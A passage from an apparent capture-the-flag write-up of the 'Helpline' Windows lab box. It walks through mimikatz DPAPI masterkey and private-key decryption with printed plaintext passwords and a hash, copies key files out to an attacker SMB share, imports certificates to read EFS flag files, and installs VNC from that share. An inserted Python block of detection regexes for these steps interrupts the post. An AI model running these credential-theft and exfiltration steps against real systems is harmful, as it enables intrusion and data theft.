    pbData             : 4ea3c71a9d7383df26037dbfe5e4cdf6fc0ba47c7cb72f319b6cd6480ced3ff383beb0987aff0f2fb7d407fc1c03356fec5abb8679b314d77442b61e60fb6a26e05bdfb45c8766f6a631ef9157acd07801d5dc11f0bb154c67667386e060ee26d23b2b8eabdc7704a4deb978b54c2ced8186a2f0f6e2dfcae00373ccebb41d0328fa8a56c10bbbdaac2d65e9aca68c96f8bda7fb813104e5c0c8c0c1098c53861a39d4e5ce9e856f07baff3373dec17e58998568493519d6d7fb09398b1370f2c90a248d85bf9a6b887f9c62efd190ccd10019fe4a99482df2fc6ca12324fc1f4c13da2ff8501ec50d8c04ba450b3e8542af7d5ad22d50d17c84ea47a181dc945ad481ba73089b453667cba5ab7edf2252bf002c36a6b68640c4feed5af84a095006445c54a546693d49fe4dd2744da7185c17777bc43c98936999011114efcc0052823ee5beafcd67ae82b6be5ed01233a7bcc61ffd13c420fc132d4be62163f4c3f33667f9eb569f0711258b6eea3f989c36f0250b7d0a8e704583546e31f8a6edfdc10fa175df1c2b8b5081cb0b5555c6d59c88bea128e574d6853c2f14bc56ecee49ac526c47b54cbf0eec70b80bde4dd9f29aa813413250c819d2a7dcfeec03abcb2e664b30e0c9b8ef1657b80d450aafe6de81dd6df8880591c6d3025f7395ba86a9b735155143e0628bdef1de7ca1a3d3dd4ffde8fb32570a92d0c87ad84706342fe3ac35d3961c780fa760e67c713a5440708cefc08f77a4d2c23e89004343f6964aa3322ce895430b1e4a33e2ab20ad5526cbd505344bc67651ff2f5b48d9dd01de8c92b7d9a56ba4cf4f1ea61276fe2daa6bc804148f38a565d2a54c20e090a03c5eb25cde18885f8153bd31a7005d18c9913387942c34ce6c9060e551dadb9be171f2a3decb46ba10fa574bededf8c5e69cea4cdfaec894f447121dff6e2fafb21ab55b92419048eb5fa39002eaa24ff88f3e08a3f23684a5d1508be1c1d3a55e73a263c0ea1a15a8c66b2b34354ab197a7f3ca14fe036959f32b27a96d54c0d978adf27ae80702c65e7eb82da6ab112fc493410242c0734d0f84641a2aa12ddf34d395eba1f26dc5cf0fde8ad7954a5444b30fc0ad1240bb198ce23a1a356fef4bb8482b839f9b0584b90b321d3cc73e37b2f6cff710c83275afdea0a9bbcd1f472bd7b6935a6ced7aea0ae0017c8d1dacc93a8d3b0206d915c4b19369529bc96104fc055ff5078fa1c5f1dd240320549bfaf8e2ec2da18c73259182a0a3964794ff93e22c6a4fae51991a0582d09b67f79331ffe9c020db6742c6b9bde98abf18c789d19246584a90b8584ac5e46c2109afbe024e4a6a273781898520c35e566c42675c7368baa892c9cabf1ec6c2c969931d1a198
7a4f622d135dfac29b11623d2560147c54257de3397f3c2e479070990deb55f197359d5282b0c59aee9c32feb16b0eb405d98bf15df04de0ec93b0adc6f827de6e81626743bed95cbc816161a11c324d7118429c2e1b923293b22254a076a33ee4e68af7e1d15b66712139fd39902548ec23834be55e1c1133ffd7ed6e3b78c003cc612cf0408acf84e8e02cf983425e9830a07982163f997785fa0ad4c088b76edfaa86e6a1ab0c315b317578f70fff21a88178153c2d7663fdc5fb5267d48998f577ca94aa538a38a0acde37d52af53d629a2f55f02f46460bd4fce7a34a750798be6b32709fa673032b27aa14d068a491a060072779c6e719621ac42f3692d91fc975bce8ac32fe81e94525b05a251e906043d8f934ebcbf49a8947ab9bbb8d4a7fc653fab9543d0c22628bb9513390656cbb9f41a103103ed0485103b3f8f75154279bae4d5de5dfb023875bf8c610435ee550b155b3052447188c0530a49399c26b4e1a57078fcbaaf2d2eed0621d2e3ff56
    dwSignLen          : 00000040 - 64
    pbSign             : 772ca28a76efbef47c88f050da7814232bbb7d72d8692d02f85a9046d0b57da2cf94b455a2c9618811b07146b26242128caed8bace68bca36e0771e05564b0dd

  pExExportFlag      :
    dwVersion          : 00000001 - 1
    guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
    dwMasterKeyVersion : 00000001 - 1
    guidMasterKey      : {9e78687d-d881-4ccb-8bd8-bc0a19608687}
    dwFlags            : 00000000 - 0 ()
    dwDescriptionLen   : 00000018 - 24
    szDescription      : Export Flag
    algCrypt           : 00006610 - 26128 (CALG_AES_256)
    dwAlgCryptLen      : 00000100 - 256
    dwSaltLen          : 00000020 - 32
    pbSalt             : d4a8381b8847c218242b61555a4d0d78b68659dd782e674408187bf52f7d171b
    dwHmacKeyLen       : 00000000 - 0
    pbHmackKey         :
    algHash            : 0000800e - 32782 (CALG_SHA_512)
    dwAlgHashLen       : 00000200 - 512
    dwHmac2KeyLen      : 00000020 - 32
    pbHmack2Key        : b6a835d975bb90aae24e128640f5459fad3cb4f418ea176acd83b25ac5828053
    dwDataLen          : 00000010 - 16
    pbData             : 07aecb012bb7f55c03ada7069f49df4c
    dwSignLen          : 00000040 - 64
    pbSign             : 1a7d25a9be8bbe328ae80b35be2d88ca63acbe4716724ac11d3c95de841e684bf56ebbafccc60fb9c07fc0c481abcd10e37c8de73e0c4905a596eed2ece22fcb

From that, I’ll also see the private key is encrypted with the masterkey 9e78687d-d881-4ccb-8bd8-bc0a19608687.

Decrypt The masterkey

I’ll use that guid to find the encrypted masterkey in C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500:

C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500>dir /a
dir /a
 Volume in drive C has no label.
 Volume Serial Number is D258-5C3B

 Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500

12/23/2018  08:54 PM    <DIR>          .
12/23/2018  08:54 PM    <DIR>          ..
12/20/2018  10:07 PM               468 61349c38-5618-45f3-8d0d-8f3b24e3e718
12/23/2018  08:54 PM               468 9e78687d-d881-4ccb-8bd8-bc0a19608687
12/23/2018  08:54 PM                24 Preferred
               3 File(s)            960 bytes
               2 Dir(s)   5,778,624,512 bytes free

I can use mimikatz with the password to decrypt the key:

mimikatz # dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:mb@letmein@SERVER#acc
  dwVersion          : 00000002 - 2
  szGuid             : {9e78687d-d881-4ccb-8bd8-bc0a19608687}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
    dwVersion        : 00000002 - 2
    salt             : 98767ea007dc468e6bc59c9ff8e666f5
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 7a25ca58aab56dcc924214a1076381e3aabe1ddfc3504fee7c0a07ab67375c1d892a54cf5bb4470079118dbb4534dcc73f180733c614d767b71709d75f361e7cf156113b2ea8841ccf08bdba2d8ac22ef1920cbf922f36fc44671e56438758dc03c481ee654361521539bef11213bd3bf0a8d76efa9e35722578111b21700c773af7224635b6708e127edcd3a9ab245a

    dwVersion        : 00000002 - 2
    salt             : df20ce5c344410a535b5307e6e4c095f
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 3e75b3e7d8dc0f04b7dc992409af01211ad82095847031dbf57ffddafce991b90f9c06854c8a40523eb10ad6f712431b986717461b4c66ab3210189e00ba760cc3ea29c352e9fcf4d2827005a886d1d6d854d76ec5b9286d0acaba0326ae67d9e88762698f136bc8bf7e88a8ba1e5c21                        

    dwVersion        : 00000003 - 3
    guid             : {712edeb8-1bb0-40a4-892c-5b3618e32d3f}

Auto SID from path seems to be: S-1-5-21-3107372852-1132949149-763516304-500

[masterkey] with password: mb@letmein@SERVER#acc (normal user)
  key : 8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8
  sha1: b18974052cb509a86a008869fd95388550678184

Now I have the masterkey (and its sha1).

Decrypt The Private Key

If I run the same command I ran earlier to get information on the private key, I’ll get more information now as mimikatz knows the masterkey:

mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"
...[snip same as before]...

Decrypting AT_EXCHANGE Export flags:
 * volatile cache: GUID:{9e78687d-d881-4ccb-8bd8-bc0a19608687};KeyHash:b18974052cb509a86a008869fd95388550678184
Decrypting AT_EXCHANGE Private Key:
 * volatile cache: GUID:{9e78687d-d881-4ccb-8bd8-bc0a19608687};KeyHash:b18974052cb509a86a008869fd95388550678184
        Exportable key : YES
        Key size       : 2048
        Private export : OK - 'raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk'

And now the .pvk file exists in the local directory:

C:\>dir \windows\system32\spool\drivers\color\*.pvk /b

I’ll copy that file back:

C:\>net use \\\share /u:df df
The command completed successfully.

C:\>copy \windows\system32\spool\drivers\color\raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk \\\share\
        1 file(s) copied.
C:\>copy \windows\system32\spool\drivers\color\FB154575993A250FE826DBAC79EF26C211CB77B3.der \\\df\
        1 file(s) copied.

Build PFX

I’ll follow the instructions from the guide and create a .pfx file:

root@kali# openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out root_public.pem
root@kali# openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk  -out root_private.pem
writing RSA key
root@kali# openssl pkcs12 -in root_public.pem -inkey root_private.pem -pass:0xdf -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out root_cert.pfx
pkcs12: Unrecognized flag pass:0xdf
pkcs12: Use -help for summary.
root@kali# openssl pkcs12 -in root_public.pem -inkey root_private.pem -password pass:0xdf -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out root_cert.pfx

Install PFX

Now I can copy that back to Helpline:

C:\>copy \\\share\root_cert.pfx \windows\system32\spool\drivers\color\
        1 file(s) copied.

And install it:

C:\>certutil -user -p 0xdf -importpfx \windows\system32\spool\drivers\color\root_cert.pfx NoChain,NoRoot
Certificate "Administrator" added to store.

CertUtil: -importPFX command completed successfully.

Access root.txt

Now I can get the flag:

C:\>type users\administrator\desktop\root.txt


I can do the same process for user.txt. I’ll see it on tolu’s desktop:

C:\Users\tolu\Desktop>dir /b

I’ve already got tolu’s hash: 03e2ec7aa7e82e479be07ecd34f1603b.

I can use cipher to get the Certificate thumbprint: 91EF 5D08 D1F7 C60A A0E4 CEE7 3E05 0639 A669 2F29.

I can verify that Certificate exists:

C:\Users\tolu\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates>dir /a /b

And run:

crypto::system /file:"C:\Users\tolu\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\91EF5D08D1F7C60AA0E4CEE73E050639A6692F29" /export

to export it and get the Key Container ID of e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.

In C:\Users\tolu\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-1011, I find a single key container, 307da0c2172e73b4af3e45a97ef0755b_86f90bf3-9d4c-47b0-bc79-380521b14c85.

The mimikatz command:

dpapi::capi /in:"C:\Users\tolu\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-1011\307da0c2172e73b4af3e45a97ef0755b_86f90bf3-9d4c-47b0-bc79-380521b14c85"

gives me a match on the pUniqueName, and gives me a masterkey of 2f452fc5-c6d2-4706-a4f7-1cd6b891c017.

I can decrypt that key with the command (I’ll use the plaintext password from the logs this time to show a different way):

dpapi::masterkey /in:"C:\Users\tolu\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-1011\2f452fc5-c6d2-4706-a4f7-1cd6b891c017" /password:!zaq1234567890pl!99

I get a master password, which mimikatz now knows. I’ll run the dpapi::capi command again, and get raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk. I’ll bring it and the cert back to kali, create the .pfx, move it back, and import it:

C:\>certutil -user -p 0xdf -importpfx \windows\system32\spool\drivers\color\user_cert.pfx NoChain,NoRoot
certutil -user -p 0xdf -importpfx \windows\system32\spool\drivers\color\user_cert.pfx NoChain,NoRoot
Certificate "tolu" added to store.

CertUtil: -importPFX command completed successfully.

Now grab user.txt:

C:\>type users\tolu\desktop\user.txt


jrk figured out another really cool way to make reading the EFS files easier - install VNC. He tried to connect over RDP, but wasn’t blocked from doing so. But when I install VNC, I can then connect to it rather easily.

Install VNC

I’ll grab the latest x64 msi installer for TightVNC from their downloads page, and I’ll drop it into a folder I’m sharing with smbserver.py.

Now, from my SYSTEM shell, I’ll run the following monster command:


That tells Windows to run the .msi installer from my share using msiexec with options to start immediately, without a restart, opening the firewall, starting a service, and setting the control password to “PASSWORD”.
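A defender's view of the PFX import earlier on this page and the MSI install just described, as an added example that is not part of the original post: a small Python triage pass over process command lines of the kind recorded by process-creation logging. The rule names, the sample lines, and the 192.0.2.10 host are constructed for illustration.

```python
import re

# Staging directory used on this page; writable by ordinary users by default.
STAGING = r"\\windows\\system32\\spool\\drivers\\color\\"
UNC = r"\\\\[^\\\s]+\\[^\\\s]+"  # matches \\host\share

# Hypothetical rule names; each regex runs against one process command line.
RULES = [
    ("pfx_import_from_staging_dir",
     re.compile(r"\bcertutil(\.exe)?\b.*-importpfx\b.*" + STAGING, re.I)),
    ("pfx_password_on_command_line",
     re.compile(r"\bcertutil(\.exe)?\b(?=.*\s-p\s+\S+)(?=.*-importpfx\b)", re.I)),
    ("key_material_copied_over_smb",
     re.compile(r"\bcopy\b(?=.*\.(pvk|pfx|der)\b)(?=.*" + UNC + r")", re.I)),
    ("net_use_inline_credentials",
     re.compile(r"\bnet(\.exe)?\s+use\b.*\s/u(ser)?:\S+\s+\S+", re.I)),
    ("quiet_msi_install_from_unc",
     re.compile(r'\bmsiexec(\.exe)?\b(?=.*/i\s+"?' + UNC + r")(?=.*/q)", re.I)),
]

# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLE = [
    r"certutil -user -p 0xdf -importpfx \windows\system32\spool\drivers\color\root_cert.pfx NoChain,NoRoot",
    r"cmd.exe /c copy \windows\system32\spool\drivers\color\key.pvk \\192.0.2.10\share\key.pvk",
    r"net use \\192.0.2.10\share /u:df df",
    r"msiexec /i \\192.0.2.10\share\vnc.msi /quiet /norestart",
    r"certutil -user -importpfx C:\Users\bob\Documents\bob.pfx",  # benign
    r"msiexec /i C:\installers\app.msi /quiet",                   # benign
]


def triage(command_lines):
    """Return {rule_name: [matching command lines]} for every rule that fired."""
    hits = {}
    for line in command_lines:
        for name, rx in RULES:
            if rx.search(line):
                hits.setdefault(name, []).append(line)
    return hits


if __name__ == "__main__":
    for rule, lines in triage(SAMPLE).items():
        print(rule, len(lines))
```

A new listener on TCP 5900 appearing shortly after a `quiet_msi_install_from_unc` hit is worth correlating with network telemetry.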

After running, it takes a minute for the port to open. But eventually it does:

root@kali# nmap -p 5900
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 15:44 EDT
Nmap scan report for
Host is up (0.031s latency).

5900/tcp filtered vnc

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

root@kali# nmap -p 5900
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 15:44 EDT
Nmap scan report for
Host is up (0.030s latency).

5900/tcp open  vnc

Nmap done: 1 IP address (1 host up) scanned in 1.41 seconds


Now I’ll use the vncviewer application on kali to connect:

root@kali# vncviewer
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "helpline"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

When prompted for a password, I’ll enter “PASSWORD”. I’m granted access to the desktop:


I’ll scroll down and open a cmd window. I’m running as leo:


I can’t exactly explain why I’m leo. I know the box must have leo’s creds because it is running the scheduled task as leo. But why does the VNC service install as leo? If you know, please leave a comment.


I can easily go to leo’s desktop, read admin-pass.xml and get the plain-text admin password. From there, I can start a terminal as administrator, and get root.txt:

root.txt via vnc

I can get the creds for tolu from the event logs, and then create a cmd as that user as well:

user.txt via vnc